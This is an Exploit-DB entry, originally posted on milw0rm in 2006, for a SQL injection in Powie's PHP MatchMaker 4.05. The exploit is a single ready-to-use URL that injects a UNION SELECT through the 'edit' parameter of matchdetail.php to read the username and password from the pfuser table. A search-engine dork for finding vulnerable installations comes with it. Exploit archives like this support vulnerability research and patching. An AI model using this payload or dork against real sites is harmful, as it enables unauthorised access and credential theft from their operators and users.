Powies MatchMaker 4.05 - 'matchdetail.php' SQL Injection

EDB-ID:

2798


Author:

SHiKaA

Type:

webapps


Platform:

PHP

Date:

2006-11-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v4.05
#
#===============================================================================================
#
#DORK :  "Powie's PSCRIPT MatchMaker 4.05"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]